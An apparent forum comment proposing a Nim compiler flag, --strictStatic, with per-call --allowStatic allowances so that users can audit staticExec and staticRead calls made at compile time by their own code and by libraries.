I agree that it's impossible for Nim to protect you if you're willing to compile other people's code.
However, it could be good if Nim provided a means for auditing calls to staticExec/staticRead. Or at least provided means for someone else to write an auditing library. I imagine something like the following could work and not be onerous either to the user or the compiler:
nim c --strictStatic myfile.nim
This would fail on all instances of staticExec with a message like:
ERROR: Prevented execution of myfile.nim:staticExec("/bin/echo foo") Pass --allowStatic:'myfile.nim:staticExec("/bin/echo foo")' to allow it
- The user verifies that they're okay with that execution and either passes the noted flag or puts it in their
config.nims:
switch("allowStatic", """myfile.nim:staticExec("/bin/echo foo")""")
- If the user always compiles with
--strictStatic, then if they update a library which includes a newstaticExeccall, compilation will fail so that they can updateconfig.nimsor reject the change.
A few notes:
- The
--allowStaticflag would be passed multiple times, one for eachstaticExec/staticReadcall. - The flag could possibly support globbing or regex, but it would be on the user to ensure their regex/glob is good.
- Nimble packages must be prevented from setting
--allowStaticfor users of the package. - I'm not sure what the format for the
--allowStaticvalue should be. That's endlessly debatable. - I also don't know if the
inputargument tostaticExecshould be included in the--allowStaticflag value. - Another flag (e.g.
-d:logStaticor something) could list all successful static calls done during compilation for further auditing.
This ability to audit code would be required for me to introduce Nim at my company, at least. And as I mentioned above, this doesn't have to be provided by the Nim stdlib, but there should be a way to hook in to staticExec such that an auditing tool could be created.